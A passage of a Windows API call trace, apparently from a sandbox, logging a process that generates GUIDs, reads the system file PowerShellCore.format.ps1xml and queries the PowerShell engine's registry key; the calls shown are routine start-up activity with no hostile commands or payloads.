	[0629.290] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xaac9a274, Data2=0xaf4e, Data3=0x4e2e, Data4=([0]=0x90, [1]=0x5d, [2]=0x41, [3]=0xdf, [4]=0xb3, [5]=0x77, [6]=0x9, [7]=0xad))) returned 0x0
	[0629.291] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x152ddf99, Data2=0xd33e, Data3=0x4682, Data4=([0]=0xac, [1]=0x88, [2]=0xf7, [3]=0x4f, [4]=0x76, [5]=0x2e, [6]=0x9a, [7]=0x2e))) returned 0x0
	[0629.299] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xfa24174f, Data2=0xcaeb, Data3=0x41f2, Data4=([0]=0x82, [1]=0xc0, [2]=0xfd, [3]=0x4a, [4]=0x26, [5]=0xf, [6]=0x27, [7]=0x85))) returned 0x0
	[0629.311] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x908f466, Data2=0x63a3, Data3=0x4775, Data4=([0]=0xb9, [1]=0xb1, [2]=0x57, [3]=0x38, [4]=0x42, [5]=0x4e, [6]=0xf9, [7]=0xe6))) returned 0x0
	[0629.322] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x352f7b90, Data2=0x413b, Data3=0x4d56, Data4=([0]=0xa3, [1]=0x6e, [2]=0x17, [3]=0x32, [4]=0xaa, [5]=0x8c, [6]=0x29, [7]=0x50))) returned 0x0
	[0629.324] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xa6b73372, Data2=0xf79d, Data3=0x4f97, Data4=([0]=0x94, [1]=0x0, [2]=0x50, [3]=0xf0, [4]=0xc5, [5]=0x71, [6]=0x60, [7]=0x94))) returned 0x0
	[0629.325] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x4ab1883c, Data2=0x3650, Data3=0x4657, Data4=([0]=0x91, [1]=0x50, [2]=0x56, [3]=0x39, [4]=0xd, [5]=0xe1, [6]=0xf6, [7]=0xd3))) returned 0x0
	[0629.327] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x17c34161, Data2=0x1297, Data3=0x42db, Data4=([0]=0x84, [1]=0xe2, [2]=0xb9, [3]=0x9b, [4]=0xf, [5]=0x86, [6]=0xa, [7]=0x51))) returned 0x0
	[0629.330] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x74a84ee7, Data2=0x916, Data3=0x4071, Data4=([0]=0x8d, [1]=0x4d, [2]=0x13, [3]=0x44, [4]=0xdc, [5]=0xfc, [6]=0x8d, [7]=0xa1))) returned 0x0
	[0629.330] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x48be0d74, Data2=0x7104, Data3=0x4f1f, Data4=([0]=0x8b, [1]=0x8d, [2]=0xd6, [3]=0x40, [4]=0x6d, [5]=0x90, [6]=0x39, [7]=0xd3))) returned 0x0
	[0629.331] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x28fbd84, Data2=0xbeef, Data3=0x4130, Data4=([0]=0x8a, [1]=0xe7, [2]=0x4f, [3]=0xf1, [4]=0xdc, [5]=0xc1, [6]=0xf, [7]=0x9e))) returned 0x0
	[0629.331] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x1ef73caa, Data2=0xeba5, Data3=0x46f1, Data4=([0]=0x9d, [1]=0xf8, [2]=0x3d, [3]=0x6a, [4]=0xc0, [5]=0xd0, [6]=0x86, [7]=0xf4))) returned 0x0
	[0629.332] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x2fc
	[0629.332] GetFileType (hFile=0x2fc) returned 0x1
	[0629.332] SetErrorMode (uMode=0x1) returned 0x1
	[0629.332] GetFileType (hFile=0x2fc) returned 0x1
	[0629.332] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.173] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.174] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.175] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.175] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.177] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.177] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.177] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.177] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.180] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.180] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.180] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.181] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.181] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.181] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.182] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.182] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.185] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.186] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.186] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.186] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x1000, lpOverlapped=0x0) returned 1
	[0630.187] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0xe67, lpOverlapped=0x0) returned 1
	[0630.187] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c033f, nNumberOfBytesToRead=0x199, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c033f*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0630.187] ReadFile (in: hFile=0x2fc, lpBuffer=0x38c0d70, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24cff8, lpOverlapped=0x0 | out: lpBuffer=0x38c0d70*, lpNumberOfBytesRead=0x24cff8*=0x0, lpOverlapped=0x0) returned 1
	[0630.187] CloseHandle (hObject=0x2fc) returned 1
	[0630.187] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cd40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0630.187] SetErrorMode (uMode=0x1) returned 0x1
	[0630.188] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershellcore.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x24cfa0 | out: lpFileInformation=0x24cfa0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67e9dda3, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67e9dda3, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x15e67)) returned 1
	[0630.188] SetErrorMode (uMode=0x1) returned 0x1
	[0630.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0630.188] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24d088 | out: phkResult=0x24d088*=0x2fc) returned 0x0
	[0630.188] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24d00c, lpData=0x0, lpcbData=0x24d008*=0x0 | out: lpType=0x24d00c*=0x1, lpData=0x0, lpcbData=0x24d008*=0x56) returned 0x0
	[0630.188] CoTaskMemAlloc (cb=0x5a) returned 0x4de240
	[0630.188] RegQueryValueExW (in: hKey=0x2fc, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24cfdc, lpData=0x4de240, lpcbData=0x24cfd8*=0x56 | out: lpType=0x24cfdc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24cfd8*=0x56) returned 0x0
	[0630.188] CoTaskMemFree (pv=0x4de240) 
	[0630.188] RegCloseKey (hKey=0x2fc) returned 0x0
	[0630.188] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24ccd0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0630.189] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24cb80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellCore.format.ps1xml", lpFilePart=0x0) returned 0x47
	[0630.199] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xb0d988d1, Data2=0xa609, Data3=0x446a, Data4=([0]=0xaf, [1]=0xe9, [2]=0x6, [3]=0x8c, [4]=0xee, [5]=0x61, [6]=0xa6, [7]=0x4d))) returned 0x0
	[0630.200] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x5e616444, Data2=0x5e3a, Data3=0x49fb, Data4=([0]=0x98, [1]=0x32, [2]=0x2b, [3]=0x59, [4]=0x95, [5]=0xca, [6]=0x1a, [7]=0x64))) returned 0x0
	[0630.200] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xc7151384, Data2=0xcac8, Data3=0x424a, Data4=([0]=0x85, [1]=0x20, [2]=0x96, [3]=0x82, [4]=0xf7, [5]=0x5f, [6]=0xf0, [7]=0xa8))) returned 0x0
	[0630.201] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xa9483ce2, Data2=0xa43d, Data3=0x41fc, Data4=([0]=0x9b, [1]=0x62, [2]=0x69, [3]=0xc4, [4]=0x21, [5]=0xef, [6]=0x19, [7]=0x3b))) returned 0x0
	[0630.201] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x598e9662, Data2=0xe192, Data3=0x4fd2, Data4=([0]=0x88, [1]=0x5d, [2]=0x30, [3]=0x89, [4]=0x3e, [5]=0x0, [6]=0x77, [7]=0x1))) returned 0x0
	[0630.202] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xff0e3f59, Data2=0x8903, Data3=0x436c, Data4=([0]=0xb1, [1]=0x82, [2]=0x6a, [3]=0xc3, [4]=0xea, [5]=0x87, [6]=0x5f, [7]=0xcb))) returned 0x0
	[0630.202] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xe20488f3, Data2=0x4dbb, Data3=0x4159, Data4=([0]=0xba, [1]=0x9c, [2]=0x47, [3]=0xe8, [4]=0x1f, [5]=0x6a, [6]=0xe5, [7]=0xe1))) returned 0x0
	[0630.202] VirtualQuery (in: lpAddress=0x24bc60, lpBuffer=0x24cb20, dwLength=0x30 | out: lpBuffer=0x24cb20*(BaseAddress=0x24b000, AllocationBase=0x1d0000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0630.204] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x39677366, Data2=0x4361, Data3=0x4607, Data4=([0]=0x94, [1]=0x4b, [2]=0xe4, [3]=0xd7, [4]=0x47, [5]=0xc6, [6]=0x7e, [7]=0x92))) returned 0x0
	[0630.204] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x61adc9d3, Data2=0x4fbc, Data3=0x48f5, Data4=([0]=0x8c, [1]=0xa2, [2]=0xd1, [3]=0x1d, [4]=0x3d, [5]=0xff, [6]=0x46, [7]=0xbc))) returned 0x0
	[0630.205] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xc23a801, Data2=0xc13a, Data3=0x49b8, Data4=([0]=0x96, [1]=0x5f, [2]=0xd4, [3]=0x8, [4]=0x97, [5]=0x1e, [6]=0xd2, [7]=0xb7))) returned 0x0
	[0630.205] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x1f9589ae, Data2=0x6c56, Data3=0x4418, Data4=([0]=0xbd, [1]=0x23, [2]=0xe0, [3]=0x69, [4]=0x1b, [5]=0x7e, [6]=0x3c, [7]=0xda))) returned 0x0
	[0630.206] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x85de626c, Data2=0x4abd, Data3=0x4896, Data4=([0]=0x93, [1]=0x50, [2]=0x56, [3]=0xa9, [4]=0x7e, [5]=0xda, [6]=0xf, [7]=0x57))) returned 0x0
	[0630.206] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xa42813da, Data2=0xed1, Data3=0x4634, Data4=([0]=0x96, [1]=0xcc, [2]=0x19, [3]=0x52, [4]=0x5, [5]=0xa2, [6]=0x50, [7]=0x96))) returned 0x0
	[0630.206] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xab0f6271, Data2=0x4f8, Data3=0x4819, Data4=([0]=0xb3, [1]=0xaa, [2]=0xc5, [3]=0x9a, [4]=0x23, [5]=0x38, [6]=0xee, [7]=0x44))) returned 0x0
	[0630.206] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xe094c499, Data2=0xc39c, Data3=0x4310, Data4=([0]=0xb9, [1]=0xd4, [2]=0x5a, [3]=0x8e, [4]=0x90, [5]=0x51, [6]=0x2e, [7]=0x3a))) returned 0x0
	[0630.206] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x926cc94c, Data2=0x9e8e, Data3=0x4693, Data4=([0]=0x98, [1]=0xab, [2]=0x27, [3]=0xee, [4]=0x87, [5]=0x91, [6]=0x7d, [7]=0x8f))) returned 0x0
	[0630.206] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xc79ffeea, Data2=0x7152, Data3=0x46cd, Data4=([0]=0xa4, [1]=0x8f, [2]=0x2c, [3]=0x54, [4]=0x75, [5]=0xff, [6]=0x4d, [7]=0x28))) returned 0x0
	[0630.207] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xbac40f65, Data2=0x440f, Data3=0x4b7f, Data4=([0]=0x8d, [1]=0x67, [2]=0x31, [3]=0x49, [4]=0x42, [5]=0x80, [6]=0xb3, [7]=0x31))) returned 0x0
	[0630.207] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x659c462b, Data2=0x6db0, Data3=0x4d68, Data4=([0]=0x91, [1]=0xd7, [2]=0xfd, [3]=0x27, [4]=0x71, [5]=0xd, [6]=0x77, [7]=0xc6))) returned 0x0
	[0630.207] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xdcc4ed08, Data2=0x1dc7, Data3=0x4d34, Data4=([0]=0xbb, [1]=0x18, [2]=0x93, [3]=0x9b, [4]=0xf3, [5]=0x1, [6]=0x8b, [7]=0xef))) returned 0x0
	[0630.207] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x4732bbf, Data2=0xf26b, Data3=0x49ff, Data4=([0]=0xbc, [1]=0x4e, [2]=0x6d, [3]=0x22, [4]=0x43, [5]=0x8a, [6]=0x94, [7]=0x7a))) returned 0x0
	[0630.207] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x4fa4dea6, Data2=0x3343, Data3=0x429d, Data4=([0]=0x86, [1]=0xb6, [2]=0x67, [3]=0x7d, [4]=0x8d, [5]=0x8a, [6]=0x9c, [7]=0xa0))) returned 0x0
	[0630.207] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x70b40c55, Data2=0xd233, Data3=0x41ef, Data4=([0]=0x86, [1]=0x5b, [2]=0xc5, [3]=0x24, [4]=0x79, [5]=0x48, [6]=0x74, [7]=0xd))) returned 0x0
	[0630.207] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x39f03e1c, Data2=0x4666, Data3=0x4ae5, Data4=([0]=0xbc, [1]=0xa5, [2]=0x53, [3]=0xc6, [4]=0xfa, [5]=0x1c, [6]=0xf7, [7]=0x4d))) returned 0x0
	[0630.208] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xbf05f118, Data2=0x7c5f, Data3=0x4bec, Data4=([0]=0xb9, [1]=0x70, [2]=0xa0, [3]=0xad, [4]=0x5d, [5]=0xc3, [6]=0x5d, [7]=0x32))) returned 0x0
	[0630.208] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x4a70954a, Data2=0x11aa, Data3=0x47ff, Data4=([0]=0xac, [1]=0x8e, [2]=0x15, [3]=0x3b, [4]=0xd7, [5]=0x43, [6]=0xc2, [7]=0xe5))) returned 0x0
	[0630.208] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x251af8cf, Data2=0xda4c, Data3=0x45b7, Data4=([0]=0x95, [1]=0xc2, [2]=0xe5, [3]=0x5f, [4]=0x37, [5]=0x2b, [6]=0x8f, [7]=0x6b))) returned 0x0
	[0630.208] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x8c506cf0, Data2=0x1da1, Data3=0x4847, Data4=([0]=0xa3, [1]=0x19, [2]=0xf8, [3]=0x92, [4]=0xfb, [5]=0x21, [6]=0xb3, [7]=0xd7))) returned 0x0
	[0630.208] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xe0bbbd3, Data2=0xbfc3, Data3=0x4947, Data4=([0]=0xa2, [1]=0x5c, [2]=0xac, [3]=0x7d, [4]=0x98, [5]=0x86, [6]=0xd2, [7]=0x6b))) returned 0x0
	[0630.208] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xf182843c, Data2=0xfc51, Data3=0x46f4, Data4=([0]=0xb5, [1]=0x54, [2]=0x71, [3]=0xa6, [4]=0x86, [5]=0xb4, [6]=0x74, [7]=0x17))) returned 0x0
	[0630.208] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x97586bed, Data2=0x46c3, Data3=0x4097, Data4=([0]=0x81, [1]=0xd3, [2]=0x27, [3]=0x4c, [4]=0xe3, [5]=0x69, [6]=0xf2, [7]=0xf3))) returned 0x0
	[0630.208] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xc78cf1a0, Data2=0x70b4, Data3=0x4a2c, Data4=([0]=0xa3, [1]=0x1b, [2]=0xd1, [3]=0xd2, [4]=0x4, [5]=0xd6, [6]=0x86, [7]=0xfc))) returned 0x0
	[0630.209] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x1fdd84f2, Data2=0xfc48, Data3=0x4caf, Data4=([0]=0xb1, [1]=0x5f, [2]=0x93, [3]=0xc3, [4]=0xb5, [5]=0x39, [6]=0xd6, [7]=0xad))) returned 0x0
	[0630.210] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x915fb77a, Data2=0x74f, Data3=0x447a, Data4=([0]=0xb2, [1]=0x29, [2]=0x9e, [3]=0xdb, [4]=0x26, [5]=0x78, [6]=0x3f, [7]=0xbc))) returned 0x0
	[0630.210] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xbfd3e1e2, Data2=0x7fa7, Data3=0x4b45, Data4=([0]=0x8e, [1]=0x60, [2]=0x8d, [3]=0x37, [4]=0xb1, [5]=0xad, [6]=0xbe, [7]=0x39))) returned 0x0
	[0630.210] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x77dc86e1, Data2=0x1964, Data3=0x4b35, Data4=([0]=0x9b, [1]=0x8d, [2]=0x3b, [3]=0xb7, [4]=0xd4, [5]=0x9a, [6]=0x4c, [7]=0xb1))) returned 0x0
	[0630.210] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xea7e5f32, Data2=0xc171, Data3=0x4617, Data4=([0]=0x93, [1]=0xab, [2]=0x2d, [3]=0xba, [4]=0x6c, [5]=0x41, [6]=0xe6, [7]=0x5f))) returned 0x0
	[0630.210] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x11236d5f, Data2=0x1704, Data3=0x43ac, Data4=([0]=0xbc, [1]=0x40, [2]=0x84, [3]=0x21, [4]=0x9f, [5]=0xd3, [6]=0x4a, [7]=0x6a))) returned 0x0
	[0630.211] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xa2bce68a, Data2=0xd721, Data3=0x419c, Data4=([0]=0xb6, [1]=0x86, [2]=0x71, [3]=0x55, [4]=0xeb, [5]=0xf6, [6]=0xd4, [7]=0xd5))) returned 0x0
	[0630.211] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x44abe2e, Data2=0xff6f, Data3=0x4bb7, Data4=([0]=0xb4, [1]=0x72, [2]=0xd3, [3]=0xa8, [4]=0x93, [5]=0x19, [6]=0xef, [7]=0x25))) returned 0x0
	[0630.211] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x805c4831, Data2=0x4f6b, Data3=0x4d90, Data4=([0]=0xb6, [1]=0x23, [2]=0xa3, [3]=0xc8, [4]=0xe2, [5]=0xc8, [6]=0x41, [7]=0x9b))) returned 0x0
	[0630.211] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xc5574aaa, Data2=0x6b38, Data3=0x409b, Data4=([0]=0x9b, [1]=0xd1, [2]=0xaa, [3]=0x8, [4]=0x75, [5]=0xeb, [6]=0xdc, [7]=0x40))) returned 0x0
	[0630.211] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0xafd96068, Data2=0xb26d, Data3=0x41db, Data4=([0]=0xb3, [1]=0x58, [2]=0xa3, [3]=0xdf, [4]=0xa, [5]=0x4d, [6]=0x41, [7]=0x10))) returned 0x0
	[0630.211] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x8ac42bbf, Data2=0x1fed, Data3=0x4507, Data4=([0]=0x92, [1]=0x8, [2]=0x64, [3]=0xa9, [4]=0xc9, [5]=0x4b, [6]=0x84, [7]=0xac))) returned 0x0
	[0630.211] CoCreateGuid (in: pguid=0x24d2b0 | out: pguid=0x24d2b0*(Data1=0x36297b67, Data2=0xb687, Data3=0x4b27, Data4=([0]=0x9d, [1]=0xc3, [2]=0x7a, [3]=0x5e, [4]=0x84, [5]=0x46, [6]=0xd7, [7]=0x5b))) returned 0x0
